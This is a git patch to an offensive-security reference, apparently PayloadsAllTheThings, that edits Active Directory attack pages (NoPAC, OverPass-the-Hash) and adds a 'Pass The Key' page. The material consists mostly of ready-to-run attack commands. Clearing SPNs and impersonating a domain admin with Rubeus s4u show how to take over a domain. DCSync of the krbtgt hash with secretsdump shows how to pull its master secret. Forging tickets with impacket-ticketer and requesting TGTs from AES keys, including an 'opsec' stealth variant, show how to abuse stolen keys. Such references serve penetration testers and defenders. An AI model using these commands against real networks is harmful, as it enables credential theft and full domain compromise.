From d603ecc3b8200aacd517cfb6da8d13980c4c7d5c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 27 Oct 2024 15:29:34 +0100 Subject: [PATCH] Pass The Key --- docs/active-directory/CVE/NoPAC.md | 7 ++- .../hash-over-pass-the-hash.md | 8 +-- docs/active-directory/hash-pass-the-key.md | 57 +++++++++++++++++++ 3 files changed, 63 insertions(+), 9 deletions(-) create mode 100644 docs/active-directory/hash-pass-the-key.md diff --git a/docs/active-directory/CVE/NoPAC.md b/docs/active-directory/CVE/NoPAC.md index 847f860..5665997 100644 --- a/docs/active-directory/CVE/NoPAC.md +++ b/docs/active-directory/CVE/NoPAC.md @@ -32,7 +32,7 @@ ``` 1. Clear the controlled machine account `servicePrincipalName` attribute ```ps1 - impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController + krbrelayx@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController powershell@windows> . .\Powerview.ps1 powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose @@ -63,7 +63,10 @@ cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT] ``` -6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'` +6. DCSync + ```ps1 + KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local' + ``` Automated exploitation: diff --git a/docs/active-directory/hash-over-pass-the-hash.md b/docs/active-directory/hash-over-pass-the-hash.md index 4ebb9ac..f501f2e 100644 --- a/docs/active-directory/hash-over-pass-the-hash.md +++ b/docs/active-directory/hash-over-pass-the-hash.md 
@@ -1,6 +1,6 @@ # Hash - OverPass-the-Hash -In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). +> In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). ### Using impacket @@ -10,9 +10,6 @@ root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ro root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache" root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass -# also with the AES Key if you have it -root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com - root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5 root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM root@kali:~$ klist @@ -26,9 +23,6 @@ root@kali:~$ klist # NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt -# More stealthy variant, but requires the AES256 hash -.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt - # Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation) .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe ``` \ No newline at end of file diff --git a/docs/active-directory/hash-pass-the-key.md b/docs/active-directory/hash-pass-the-key.md new file mode 100644 index 0000000..1d4c5af --- /dev/null +++ b/docs/active-directory/hash-pass-the-key.md 
@@ -0,0 +1,57 @@
+# Hash - Pass The Key
+
+Pass The Key allows attackers to gain access to systems by using a valid session key instead of the user's password or NTLM hash. This technique is related to other credential-based attacks like Pass The Hash (PTH) and Pass The Ticket (PTT) but specifically uses session keys to authenticate.
+
+Pre-authentication requires the requesting user to provide a secret key, which is derived from their password and may use encryption algorithms such as DES, RC4, AES128, or AES256.
+
+* **RC4**: ARCFOUR-HMAC-MD5 (23), in this format, this is the NTLM hash, go to **Pass The Hash** to use it directly and **Over Pass The Hash** page to request a TGT from it.
+* **DES**: DES3-CBC-SHA1 (16), should not be used anymore and have been deprecated since 2018 ([RFC 8429](https://www.rfc-editor.org/rfc/rfc8429)).
+* **AES128**: AES128-CTS-HMAC-SHA1-96 (17), both AES encryption algorithms can be used with Impacket and Rubeus tools.
+* **AES256**: AES256-CTS-HMAC-SHA1-96 (18)
+
+In the past, there were more encryptions methods, that have now been deprecated.
+
+| enctype | weak?| krb5 | Windows |
+| -------------------------- | ---- | ------ | ------- |
+| des-cbc-crc | weak | <1.18 | >=2000 |
+| des-cbc-md4 | weak | <1.18 | ? |
+| des-cbc-md5 | weak | <1.18 | >=2000 |
+| des3-cbc-sha1 | | >=1.1 | none |
+| arcfour-hmac | | >=1.3 | >=2000 |
+| arcfour-hmac-exp | weak | >=1.3 | >=2000 |
+| aes128-cts-hmac-sha1-96 | | >=1.3 | >=Vista |
+| aes256-cts-hmac-sha1-96 | | >=1.3 | >=Vista |
+| aes128-cts-hmac-sha256-128 | | >=1.15 | none |
+| aes256-cts-hmac-sha384-192 | | >=1.15 | none |
+| camellia128-cts-cmac | | >=1.9 | none |
+| camellia256-cts-cmac | | >=1.9 | none |
+
+Microsoft Windows releases Windows 7 and later disable single-DES enctypes by default.
+
+
+Either use the AES key to generate a ticket with `ticketer`, or request a new TGT using `getTGT.py` script from Impacket.
+
+## Generate a new ticket
+
+* [fortra/impacket/ticketer.py](https://github.com/fortra/impacket/blob/master/examples/ticketer.py)
+ ```powershell
+ impacket-ticketer -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 -domain lab.local Administrator -domain-sid S-1-5-21-2218639424-46377867-3078535060
+ ```
+
+## Request a TGT
+
+* [fortra/impacket/getTGT.py](https://github.com/fortra/impacket/blob/master/examples/getTGT.py)
+ ```powershell
+ impacket-getTGT -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 lab.local
+ ```
+
+* [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)
+ ```powershell
+ .\Rubeus.exe asktgt /user:Administrator /aes128 bc09f84dcb4eabccb981a9f265035a72 /ptt
+ .\Rubeus.exe asktgt /user:Administrator /aes256:2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 /opsec /ptt
+ ```
+
+
+## References
+
+* [MIT Kerberos Documentation - Encryption types](https://web.mit.edu/kerberos/krb5-1.18/doc/admin/enctypes.html)
\ No newline at end of file